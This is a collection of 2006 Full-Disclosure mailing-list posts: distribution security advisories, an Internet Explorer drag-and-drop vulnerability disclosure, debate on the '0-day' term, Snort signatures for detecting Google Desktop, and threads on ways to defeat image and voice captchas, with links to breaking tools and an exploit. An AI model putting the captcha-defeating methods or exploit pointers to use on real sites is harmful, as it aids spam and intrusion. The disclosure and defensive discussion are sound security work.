Re: [Full-disclosure] On the "0-day" term
Steven M. Christey wrote: One would hope that there is some critical mass (i.e. number of compromised systems) beyond which any in-the-wild 0-day would become publicly known. We can't presume that all 0-day exploits will end up being widely observed and thus become well-known. This is not a valid presumption even if it ends up being true in practice, today. The real challenge is for incident response forensics staff to equip themselves ahead of time with the necessary tools (and sources of forensic logs, including, for example, full packet capture logs of all network traffic within a rolling window time period that is as lengthy as possible) to be able to identify a 0-day exploit used as the source of entry for a one-off intrusion event. Being able to detect, reliably, any changes made to configuration settings or on-disk and in-memory binaries altered by the intruder is good, too, but the capability to ascertain precisely what vulnerability got exploited to gain entry in the first place is critical to keeping the same well-prepared intruder out the second time around. Some of the technical barriers to achieving full forensic awareness within the time period during which a relevant 0-day event occurred include the use of SSL and other encryption which bypasses simple packet capture logging (unless one's SSL engine also logs all session keys generated) and the processing power and storage space required to capture, store, and analyze such a large quantity of real-time and historical data. Not to mention the questionable probability that the log windows will be wide enough to contain useful information when an intrusion is finally noticed. Dramatic improvements in this area of computer and network forensics would fundamentally alter modern information security. I do not see how any organization can believe itself to be adequately secured when the simple ability to prove security measures are working, and quickly determine the precise method of failure when they break down, essentially does not exist today. Sincerely, Jason Coombs [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Internet Explorer drag&drop 0day
Hi Thierry Zoller, I have a couple of problems/questions reguarding your web-site: On the Secure-It details page [ http://www.sniff-em.com/secureit.shtml ] under the heading "Do you have a demonstration ?", both links to the demo "exploit" are dead. [ http://www.freewebs.com/shreddersub7/htm.htm ] [ http://www.freewebs.com/shreddersub7/htm.htm%20 ] My primary concern however is that the method chosen to open those links. I assume in an attempt to hide the target url you meant to use the * onclick * javascript event, or even the * onmousedown * or * onmouse * up, but surely not the * onmouseover * ! You are aware that you current chosen method would have launched your exploit on the machine of a prospective customer, without so much as a clicks worth of their consent, had the links worked and by some small miracle they had disabled pop-up blocking etc. I do wish you the best of luck in your ventures. Your products appear both useful and interesting. Please give your web designer a whack on the side of the head though. Regards Markus Gadi Evron wrote: Dear Gadi Evron, Just a note Users of Secure-it were already protected against this as it blocks the shell.explorer interface since 2005: http://www.sniff-em.com [Freeware] Cool. Thanks. That's the most polite and non-evasive commercial plug-in I've seen in a while! :) I mean that! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] On the "0-day" term
In the "Internet Explorer drag&drop 0day" thread, Gadi Evron said: >In my opinion, this comes to prove 0days are USUALLY a "myth" (WMF >being a good example of a real 0day), It's not necessarily that 0-days are a myth, it's that people have been using the term "0-day" to mean two separate things: - in-the-wild hacks of live systems using vulnerabilities previously unkown to the public and the vendor; - release of exploit information for vulnerabilities previously unkown to the public and the vendor, for which there are no known in-the-wild hacks of live systems at the time of disclosure (though such hacks seem to occur very soon afterward) >Does anyone still think bad guys don't exploit (to whatever goals) a >0day if it is out there? The answer seems obvious, but... It's not entirely clear to me how many in-the-wild 0-days exist and are actively exploited. Just because some "white hat" finds something does not mean that we should ALWAYS assume that the "black hats" already know about it. The converse is also true, of course; see the recent WMF issue. Certainly, at least a couple in-the-wild 0-days are publicized a year, and maybe more in the coming year, given the precedents of the past 6 months or so, as the honeymonkeys project and Websense have shown. One would hope that there is some critical mass (i.e. number of compromised systems) beyond which any in-the-wild 0-day would become publicly known. This cricital mass would depend on the diligence of the incident response community and the amount of coordination - direct or indirect - with the vulnerability research community. - Steve ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 970-1] New kronolith packages fix cross-site scripting
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 970-1 [EMAIL PROTECTED] http://www.debian.org/security/ Martin Schulze February 14th, 2006 http://www.debian.org/security/faq - -- Package: kronolith Vulnerability : missing input sanitising Problem type : remote Debian-specific: no CVE ID : CVE-2005-4189 Debian Bugs: 342943 349261 Johannes Greil of SEC Consult discovered several cross-site scripting vulnerabilities in kronolith, the Horde calendar application. The old stable distribution (woody) does not contain kronolith packages. For the stable distribution (sarge) these problems have been fixed in version 1.1.4-2sarge1. For the unstable distribution (sid) these problems have been fixed in version 2.0.6-1 of kronolith2. We recommend that you upgrade your kronolith and kronolith2 packages. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - Source archives: http://security.debian.org/pool/updates/main/k/kronolith/kronolith_1.1.4-2sarge1.dsc Size/MD5 checksum: 581 246f510d44a3a79fe88d9b6f0efc0cda http://security.debian.org/pool/updates/main/k/kronolith/kronolith_1.1.4-2sarge1.diff.gz Size/MD5 checksum:12005 c10a7d82b97300d62e6ef45f6e5e3cfe http://security.debian.org/pool/updates/main/k/kronolith/kronolith_1.1.4.orig.tar.gz Size/MD5 checksum: 530945 8f5e5bca2a8b383e8a00fe19dacd138f Architecture independent components: http://security.debian.org/pool/updates/main/k/kronolith/kronolith_1.1.4-2sarge1_all.deb Size/MD5 checksum: 528516 4d4ed7e51485ca96008175597612d72a These files will probably be moved into the stable distribution on its next update. - - For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce@lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (GNU/Linux) iD8DBQFD8XAcW5ql+IAeqTIRAjp+AJ9EffBZe1efwqrHw3aQF+2ZYH8uqACgpJIV ajR2qC8yv8FSOiJAKgsrGig= =YG+o -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDKSA-2006:039 ] - Updated gnutls packages fix libtasn1 out-of-bounds access vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2006:039 http://www.mandriva.com/security/ ___ Package : gnutls Date: February 13, 2006 Affected: 10.1, 10.2, 2006.0 ___ Problem Description: Evgeny Legerov discovered cases of possible out-of-bounds access in the DER decoding schemes of libtasn1, when provided with invalid input. This library is bundled with gnutls. The provided packages have been patched to correct these issues. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0645 ___ Updated Packages: Mandriva Linux 10.1: 854980401ea37c7ffc74837684dda112 10.1/RPMS/gnutls-1.0.13-1.2.101mdk.i586.rpm a7dbf3fc153f1cd47a70562c2f35583a 10.1/RPMS/libgnutls11-1.0.13-1.2.101mdk.i586.rpm 8f68fb4a8d295539c7067365b13e04fc 10.1/RPMS/libgnutls11-devel-1.0.13-1.2.101mdk.i586.rpm 9df50e7e944f3ceb82428920e3bafe15 10.1/SRPMS/gnutls-1.0.13-1.2.101mdk.src.rpm Mandriva Linux 10.1/X86_64: 3fb98a2a65b1b0b0555ddff0e61a4a7b x86_64/10.1/RPMS/gnutls-1.0.13-1.2.101mdk.x86_64.rpm d5ff612ea97c5668e7848e32de9b899c x86_64/10.1/RPMS/lib64gnutls11-1.0.13-1.2.101mdk.x86_64.rpm 45fbf72c634244ae61d6ed480a14b299 x86_64/10.1/RPMS/lib64gnutls11-devel-1.0.13-1.2.101mdk.x86_64.rpm 9df50e7e944f3ceb82428920e3bafe15 x86_64/10.1/SRPMS/gnutls-1.0.13-1.2.101mdk.src.rpm Mandriva Linux 10.2: dd212f4fd56ded6d63c67e6d2f95ccec 10.2/RPMS/gnutls-1.0.23-2.2.102mdk.i586.rpm 66cf0d26c552ed36223834a386e78bda 10.2/RPMS/libgnutls11-1.0.23-2.2.102mdk.i586.rpm 4cfb3fdfec9bb89fc3c3f0427320f226 10.2/RPMS/libgnutls11-devel-1.0.23-2.2.102mdk.i586.rpm efb634eaa2e492a97d5a1c133ba203d0 10.2/SRPMS/gnutls-1.0.23-2.2.102mdk.src.rpm Mandriva Linux 10.2/X86_64: 0660da8e12eeb87752c711815ae28772 x86_64/10.2/RPMS/gnutls-1.0.23-2.2.102mdk.x86_64.rpm 014d51131f651270d1794b1870aed135 x86_64/10.2/RPMS/lib64gnutls11-1.0.23-2.2.102mdk.x86_64.rpm 2835b640d5dc9a44d97f2bd6d4742898 x86_64/10.2/RPMS/lib64gnutls11-devel-1.0.23-2.2.102mdk.x86_64.rpm efb634eaa2e492a97d5a1c133ba203d0 x86_64/10.2/SRPMS/gnutls-1.0.23-2.2.102mdk.src.rpm Mandriva Linux 2006.0: 2dfb7ff638e5460a96629f12b33c12d5 2006.0/RPMS/gnutls-1.0.25-2.1.20060mdk.i586.rpm baacaaf99353a45d410291a3b9588c5e 2006.0/RPMS/libgnutls11-1.0.25-2.1.20060mdk.i586.rpm 6eb83ab7dcff2dbfd0da0cff97d87e1d 2006.0/RPMS/libgnutls11-devel-1.0.25-2.1.20060mdk.i586.rpm 0558c6186fc001fa409d5802d6b09876 2006.0/SRPMS/gnutls-1.0.25-2.1.20060mdk.src.rpm Mandriva Linux 2006.0/X86_64: 811e7ba9b1a8df7e7055d2719f8e8265 x86_64/2006.0/RPMS/gnutls-1.0.25-2.1.20060mdk.x86_64.rpm 0eb960f072648f8ae1e6c2f2b204ddd1 x86_64/2006.0/RPMS/lib64gnutls11-1.0.25-2.1.20060mdk.x86_64.rpm 6c767b46c44d485c8b62150336c73948 x86_64/2006.0/RPMS/lib64gnutls11-devel-1.0.25-2.1.20060mdk.x86_64.rpm 0558c6186fc001fa409d5802d6b09876 x86_64/2006.0/SRPMS/gnutls-1.0.25-2.1.20060mdk.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.4 (GNU/Linux) iD8DBQFD8S4qmqjQ0CJFipgRAj4XAJ4347J7gCsR250n5fRIxIvy2PNzCACfa2v1 Z4gWlfsU/2DdjVjs17T1SUI= =c7Oo -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Latest wu-ftpd exploit :-s
You're about 2 years too late. Mark Heiligen wrote: http://www.frsirt.com/exploits/08.11.0x82-wu262-advanced.c.php ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Advisory: Internet Explorer Drag and Drop Redeux [CVE-2005-3240] (fwd)
-BEGIN PGP SIGNED MESSAGE- Hash: RIPEMD160 My apologies to those who are receiving this late or are otherwise inconvenienced by the staggered release. I had unexpected, last-minute travel issues that interfered somewhat with today's release. Of note since the initial drafting of the advisory is that Microsoft has released a blog post on the MSRC blog about the vulnerability report, which can be read here: http://blogs.technet.com/msrc/archive/2006/02/13/419439.aspx The technical/strategic points about the exploit that are raised in the post are indeed accurate (though it references MS05-014, when I believe the correct reference is MS05-008/MS05-013). The exploit has a greater dependence on timing than previous, related attacks. As such, Microsoft's decision not to include this issue in a standalone patch is seemingly justified at this point. However, the point of disagreement with Microsoft remains the choice of release *timeline*. I released the information about this issue to a trusted colleague (Gadi Evron) for publication today, after what I felt was a reasonable time, in light of my difficulties obtaining internet access. Though there are disagreements between myself and Microsoft about the nature of this vulnerability, I would like to thank Brian Schafer of the MSRC for adhering to a high level of professionalism and technical accuracy in that post and for continuing to work with me once it was made clear that the issue would imminently become public. Also of note is that there was a typo in the information I provided originally to SecuriTeam. The proper candidate is CVE-2005-3240, not *3840* as was originally reported by me. SecurityFocus has also informed me that my original BID reservation was a casualty of a data migration and that the proper BID associated with this vulnerability is now BID 16352, which is public in full detail as of this writing. There have also been some incorrect reports made to SecuriTeam that this issue does not affect Windows XP Service Pack 2. These reports are not correct -- my testing during this investigation was done exclusively on current installations of Windows 2000 and Windows XP. These systems had all service packs applied and all updates installed when tests were performed. Thanks to Gadi Evron for doing some of my bidding today and taking some of the heat for my fat-fingers. The final advisory, corrected with the now-accurate references is attached with an armored-format PGP signature inline. - -- "Social Darwinism: Try to make something idiot-proof, nature will provide you with a better idiot." -- Michael Holstein -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (MingW32) Comment: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xB5444D38 iD8DBQFD8Shufp4vUrVETTgRA/hpAJ9DobMIa4EH8otBMNlzIPK6RrMGUgCfcrrj ZI9G00rer59rLkwI5uH0KGQ= =DQ2a -END PGP SIGNATURE- Microsoft Internet Explorer Drag-and-Drop Redeux I. SYNOPSIS Affected Systems: * Microsoft Internet Explorer 5.01 * Microsoft Internet Explorer 5.5 * Microsoft Internet Explorer 6.0 - Windows 98 - Windows 98 Second Edition - Windows Millennium Edition - Windows 2000 - Windows XP - Windows Server 2003 Risk: Medium Impact: Potential remote code execution with some user interaction Status: Uncoordinated Release Author: Matthew Murphy ([EMAIL PROTECTED]) II. VULNERABILITY OVERVIEW Microsoft Internet Explorer suffers from a vulnerability in its handling of certain drag-and-drop events. As a result, it is possible for a malicious web site to predict and exploit the timing of a drag-and-drop operation such that any drag operation (including using scroll-bars) could potentially lead to the installation of arbitrary files in sensitive locations that may enable further system compromise. III. TECHNICAL DESCRIPTION As a result of recent updates to its drag-and-drop functionality, Internet Explorer now imposes a rigid set of restrictions on most drag-and-drop sources: * Input to the browser from other applications is not permitted. * Dragging an object from inside a frame is not permitted. * Dragging an HTML element from a top-level window will produce a security warning. However, certain objects not derived from an HTML document (specifically, file objects within a folder view) remain draggable. This gives rise to a potential race condition in the handling of user input. If an attacker can persuade a user to drag any object within the top-level window that his/her site is contained in, malicious script can redirect these inputs to other top-level windows, potentially resulting in an unintended consequence such as file installation. Proof-of-concept code has been developed that utilizes a pop-under window pointing to a malicious file share. This window can be created using window.
[Full-disclosure] Advisory: Internet Explorer Drag and Drop Redeux [CVE-2005-3240] (fwd)
-BEGIN PGP SIGNED MESSAGE- Hash: RIPEMD160 My apologies to those who are receiving this late or are otherwise inconvenienced by the staggered release. I had unexpected, last-minute travel issues that interfered somewhat with today's release. Of note since the initial drafting of the advisory is that Microsoft has released a blog post on the MSRC blog about the vulnerability report, which can be read here: http://blogs.technet.com/msrc/archive/2006/02/13/419439.aspx The technical/strategic points about the exploit that are raised in the post are indeed accurate (though it references MS05-014, when I believe the correct reference is MS05-008/MS05-013). The exploit has a greater dependence on timing than previous, related attacks. As such, Microsoft's decision not to include this issue in a standalone patch is seemingly justified at this point. However, the point of disagreement with Microsoft remains the choice of release *timeline*. I released the information about this issue to a trusted colleague (Gadi Evron) for publication today, after what I felt was a reasonable time, in light of my difficulties obtaining internet access. Though there are disagreements between myself and Microsoft about the nature of this vulnerability, I would like to thank Brian Schafer of the MSRC for adhering to a high level of professionalism and technical accuracy in that post and for continuing to work with me once it was made clear that the issue would imminently become public. Also of note is that there was a typo in the information I provided originally to SecuriTeam. The proper candidate is CVE-2005-3240, not *3840* as was originally reported by me. SecurityFocus has also informed me that my original BID reservation was a casualty of a data migration and that the proper BID associated with this vulnerability is now BID 16352, which is public in full detail as of this writing. There have also been some incorrect reports made to SecuriTeam that this issue does not affect Windows XP Service Pack 2. These reports are not correct -- my testing during this investigation was done exclusively on current installations of Windows 2000 and Windows XP. These systems had all service packs applied and all updates installed when tests were performed. Thanks to Gadi Evron for doing some of my bidding today and taking some of the heat for my fat-fingers. The final advisory, corrected with the now-accurate references is attached with an armored-format PGP signature inline. - -- "Social Darwinism: Try to make something idiot-proof, nature will provide you with a better idiot." -- Michael Holstein -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (MingW32) Comment: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xB5444D38 iD8DBQFD8Sb9fp4vUrVETTgRA6VJAKCL+fMJ8b+cIyOPE5Ld+3C2vgCIOgCffRW5 f1H8M88AzB9oMaE32XUUFbk= =AVSg -END PGP SIGNATURE- smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] defeating voice captchas
One of the newest (now known though) tricks in the Captcha book is using Voice. If users cannot understand what the letters are in the now too-complex Captchas that are forced on us due to spammer counter-measures at defeating Captchas, he or she can click on an icon and listen to it. :) Here is the earliest example of it that I know of: http://www.notonebit.com/projects/killbot/kbaudio.php That example is a bit amateurish, as the recording is bad and obviously not done by a girl with a sexy voice. Still, the disturbance from the bad Microphone can be eliminated or kept entirely. It doesn’t matter. In this case each letter is played by itself. Further, each letter was recorded only once. Therefore, how many times does one have to refresh the page and listen to the Captcha to be able to simply learn to identify the Captcha by say, an MD5 hash of the audio for each letter? Even if it was all set in one audio file, and even if the audio was played with to be, as an example, in a higher pitch. Or perhaps even if several different voices would greet us… Looking at general similarities in the audio file itself would be enough to break down this Captcha once enough harvesting attempts (not that many really) were saved. Auto-generated voice? That sounds easy to beat but I am not an audio expert so, “sounds like” will stay as my opinion. It’s is great to be able to finally understand these new annoying Captchas, but already we are getting to a point where one can’t understand the recorded speech either due to counter-measures from the spammers and the Captchas becoming more and more difficult. For information on breaking regular text-image Captchas, check: http://en.wikipedia.org/wiki/Captcha http://blogs.securiteam.com/index.php/archives/208 For my post on new comment spam problems: http://blogs.securiteam.com/index.php/archives/285 This text can be found here: http://blogs.securiteam.com/index.php/archives/287 Gadi. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ GLSA 200602-06 ] ImageMagick: Format string vulnerability
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200602-06 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: ImageMagick: Format string vulnerability Date: February 13, 2006 Bugs: #83542 ID: 200602-06 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis A vulnerability in ImageMagick allows attackers to crash the application and potentially execute arbitrary code. Background == ImageMagick is an application suite to manipulate and convert images. It is often used as a utility backend by web applications like forums, content management systems or picture galleries. Affected packages = --- Package/ Vulnerable /Unaffected --- 1 media-gfx/imagemagick < 6.2.5.5 >= 6.2.5.5 Description === The SetImageInfo function was found vulnerable to a format string mishandling. Daniel Kobras discovered that the handling of "%"-escaped sequences in filenames passed to the function is inadequate. This is a new vulnerability that is not addressed by GLSA 200503-11. Impact == By feeding specially crafted file names to ImageMagick, an attacker can crash the program and possibly execute arbitrary code with the privileges of the user running ImageMagick. Workaround == There is no known workaround at this time. Resolution == All ImageMagick users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=media-gfx/imagemagick-6.2.5.5" References == [ 1 ] CVE-2006-0082 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0082 [ 2 ] GLSA 200503-11 http://www.gentoo.org/security/en/glsa/glsa-200503-11.xml Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200602-06.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2006 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.0 signature.asc Description: OpenPGP digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] Comment Spam: new trends, failing counter-measures and why it's a big deal
> http://en.wikipedia.org/wiki/Captcha#Defeating_Captchas > might be a good place to start. pwntcha is supposedly quite successful. Thanks for the tip. Shame on me for not clicking the Wikipedia link last time. I will comment on the links I found worth while. 1) http://www.puremango.co.uk/cm_breaking_captcha_115.php Different subject: it explains how to defeat poor implementations of it that don't get rid of the session. 2) http://www.puremango.co.uk/acdc_breakcaptcha.php Gonna look into it, seems promising in the aspect of letting me supply an image of my choice. 3) http://web.archive.org/web/20050329185234/http://sam.zoy.org/pwntcha/ (quote) "Q. Please give me a copy of PWNtcha so that I can test it on my own CAPTCHA and see how efficient it is! A. PWNtcha does not work that way. It is not an intelligent program that tries to decode a random CAPTCHA. Such a program would be nearly impossible to do. PWNtcha is simply a toolkit of image manipulation functions, and a list of known CAPTCHAs with the associated list of image operations to apply in order to decode each of them. If I have never seen your CAPTCHA, then PWNtcha does not know about it, and there is absolutely no way it could decode it." I've been saying from the start that I'm aware of the fact that there are *some* programs that can defeat *some* captchas, just like this one. Also, it doesn't offer what (2) did, probably because of the quote above. Still, it's a page that is quite useful: it explains the weaknesses of the certain implementations. I guess we can all learn from all these, some examples: 1) destroy the session when not needed any more 2) change the picture on a wrong attempt 3) take measures against 'brute force' 4) don't use constant parts (font, background, colors) 5) use rotation, deformation, maybe letters in 3D (adding extra edges ;]) 6) layer more words on each other 7) if you sense too much spam, change a few things etc etc etc I probably left out a lot of things that should be considered, so additional ideas are very welcome. php0t ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] blocking Google Desktop
I am using Google desktop version 4. By default search across computers is not enabled. Can someone explain me why all the noise if I just don't use the feature. True, it's not enabled by default, but Google is pitching this as an easy way to access your work documents from home (or vise-versa) .. and *that* is a serious security risk. In the corporate world, users don't get to make their own choices. Management makes them, and it's the IT department's job to enforce that -- against the user's will kicking and screaming, if necessary. ~Mike. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] blocking Google Desktop
On Mon, 13 Feb 2006 23:38:41 +0530, Prabhat Sharma said: > I am using Google desktop version 4. By default search across computers is > not enabled. Can someone explain me why all the noise if I just don't use > the feature. The noise is because many of us have dozens, or hundreds, or thousands of users we're responsible for, who *will* enable it because it looks cool, not realizing the security implications. A significant fraction will enable it Just Because, even though they then never actually *use* the functionality pgpk9t5KhLzCT.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] blocking Google Desktop
I am using Google desktop version 4. By default search across computers is not enabled. Can someone explain me why all the noise if I just don't use the feature.I believe that educating the users is the best way to safeguard against issues like this. As my understanding says most of the incidents take place, not because of technical superiority of the attacker (virus)(It applies to issues like GDS as well) but because of social engineering or insufficient due diligence from user's part. PS: No offense to anyone. If what I am thinking is wrong kindly correct me. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] blocking Google Desktop
First, I made a mistake in the version number. The current/new one is version 3 (the one that uploads your data to Google) I've been experimenting with Snort sigs to detect this. Google Desktop uses a unique user-agent (I got a tip about this from another user at full-disclosure -- thanks Charles!) : User-Agent: Mozilla/4.0 (compatible; Google Desktop) So here is a snort sig for that ... alert tcp $HOME_NET any -> $EXTERNAL_NET 80 (msg: "BLEEDING-EDGE Google Desktop User-Agent Detected"; flow: to_server,established; content:"User-Agent\: Mozilla/4.0 (compatible\; Google Desktop)"; nocase; classtype: policy-violation; sid: 301; rev:1; ) That sig would at least let you know who's using it, but blocking that traffic wouldn't do anything except prevent the RSS feeds (news, weather, etc) from loading. Now, for the file-specific stuff, since that's all done over SSL to google.com : Upon examining the SSL/TLS session setup, I wrote this one to flag the certificate Google is using (from Thwarte). This will probably change when they change/renew their certificates. alert tcp $EXTERNAL_NET 443 -> $HOME_NET 1024:65535 (msg: "BLEEDING-EDGE Google SSL key exchange"; flow: from_server,established; content:"|30 36 30 36 30 37 32 32 31 32 35 34 5A 30 68 31|"; rawbytes; content:"|77 77 77 2E 67 6F 6F 67 6C 65 2E 63 6F 6D|"; rawbytes; classtype:policy-violation; sid: 302; rev:1; ) Note that this also flags logons to gmail. The fetches with the "Google Desktop" user-agent happen first when the application is started -- then you get the SSL setup for any new data to be uploaded to Google's servers. Unfortunately, the dynamic/activate stuff in snort dosen't let you do an "alert" action after an activate -- because it's designed to just dump the next (n) packets. If there was a good way to chain the two rules together -- to say "after seeing 1, do REACT on #2" you could reliably kill any SSL/TLS sessions from somebody running Google Desktop, thus preventing the upload of anything. Thoughts? Michael Holstein CISSP GCIA Cleveland State University ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] Comment Spam: new trends, failing counter-measures and why it's a big deal
> > the global solution against word recognition based challenges? If it > > was like that, it would mean that there is no way anybody could make > > an image generator that would change its success rate from 90% to > > 0%... > It's *really* *really* difficult to produce a graphic image of letters and numbers that is still recognizable to a human but can't > be beaten by a good edge-detection algorithm. For instance, you can "bleed" the edges so that they're fuzzy - but then the > human has a hard time telling if it's an 'i' or an 'l', or an 'h' or a 'b' (and so on). This is kind of like the problem that you have when you get a confirmation code in SMS, and you can't tell between I's and l's etc thanks to your mobile phone's display. But that doesn't mean the problem is about verifying the person via SMS. They just need to filter / change some letters used to make it a little more obvious (and maybe balance it with longer strings). What you're saying sounds nice, but I ask again - both of you - to post some links to some of these high success rate AI bots (preferably php's) with that algo you say is hard to beat. I'm certainly interested in this, because all this time I thought that even if there were *some* applications that could defeat *some* challenges, the Turing test was still up to the current times, but what you're telling me totally contradicts that. Since you both mentioned these things as certain existing facts, it would be nice to get a reference to a URL (preferably more) so people could just look at it (them) and try for themselves (and naturally play around with them until they beat it - you say it's *very very* hard, I say I have yet to see it - even if it's hard, it'd be worth my time to experiment with it, others will probably agree who think this subject is interesting). Yes, I googled, I didn't get > I suppose you *could* put up a picture of something, and ask "What is this a picture of" - but then you need a sufficiently > large library of images that an attacker can't just download all of them and have a human name each one once. And of > course, this has the danger that a user can be left saying: "WTF? Is that an antelope or a gazelle?" You're right, I don't like the idea of having a database of all the possible answers, and the antelope/gazelle thing certainly got me pissed on the captcha site. When I tested it, first it was a couple of bugs (I didn't find neither insect, neither bug in the list), then it was umbrellas with an exception picture - it was more like a pain in the ass, a computer would have better luck by going through the option list :P Eagerly waiting for examples, php0t Ps: these are what I found on google about the subject. They're nice, but 1) they contain no code / tryout option, and some of them only focus on solving certain captchas. (as I previously said, *some* apps, *some* tests...) http://www.comp.leeds.ac.uk/fyproj/reports/0405/Rice.pdf http://algoval.essex.ac.uk/rep/textloc/IjdarSpecialFinal.pdf http://bhiv.com/2005/09/30/defeating-diggs-captcha/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] BackTrack developer edition
Hi all,Does anyone has a link for downloading the "BackTrack developer edition" ?Best regards.-- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Need some advice for a new customer
Here's the question: Should the company notify their customers of a POSSIBLE compromise of their data? I have been trying to convince them that they should operate as though the data is compromised. Is that the right position to take as a security consultant? What would be the consequence to their business be if the news of compromise came from a third party, and not the business itself? They need to get out front on this. -- Hawaiian Astronomical Society: http://www.hawastsoc.org HAS Deepsky Atlas: http://www.hawastsoc.org/deepsky ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Internet Explorer drag&drop 0day
On Mon, 13 Feb 2006 09:05:47 EST, Shyaam said: > I am looking for ebooks and dumps for the Security Certified Network > Professional and the Security Certified Network Associate. Kindly please do > send any resources to my personal email or the group so that it would be > helpful for everyone who are taking that cert. The e-books are almost certainly copyrighted, and somebody is likely expecting to be paid for them. Keep that in mind as you pursue this white-hat cert. ;) pgpdxgkXIllsw.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Comment Spam: new trends, failing counter-measures and why it's a big deal
